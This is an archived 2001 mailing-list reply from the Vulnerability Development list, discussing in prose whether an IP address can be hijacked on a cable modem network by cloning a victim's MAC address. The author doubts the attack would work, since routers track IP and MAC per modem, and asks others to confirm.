Vulnerability Development mailing list archives

Re: Hijack IP Address using cable modem

From: cdowns <cdowns () SKILLSOFT COM>
Date: Wed, 28 Mar 2001 21:32:24 -0500

Patrick Patterson wrote:

I think I see where Patrick was coming from with this:

Victim turns on his computer, and gets an IP address
Cracker, while sniffing the Cable segment notices that IP adress foo is
assigned to MAC bar
Cracker changes his own MAC address to bar, and brings up IP address foo on
this new MAC address (some Ethernet cards have overwritable MAC addresses)
Since both Cracker and Victim have the same MAC, Cracker get's all packets
for Victims computer, and is able to impersonate victim.

This is just a slightly more sophisticated IP Address Spoofing attack.... and
I don't think it will work...

From what I know of Cablemodem networks, there are actually several parts.

1: The cable network - the 'Modem' talks to the Cable Company terminal
equipment and ensures that you are a valid subscriber.
2: The IP Network - the routers keep track of which IP and MAC, is on which
Cable Modem - thus making this attack unlikely to succeed....

I haven't tested this, and might be horribly wrong, but I don't think so -
this is one of those things that looks better in theory than in practice - Is
anyone from @HOME or ATT around to confirm/deny what's I've written?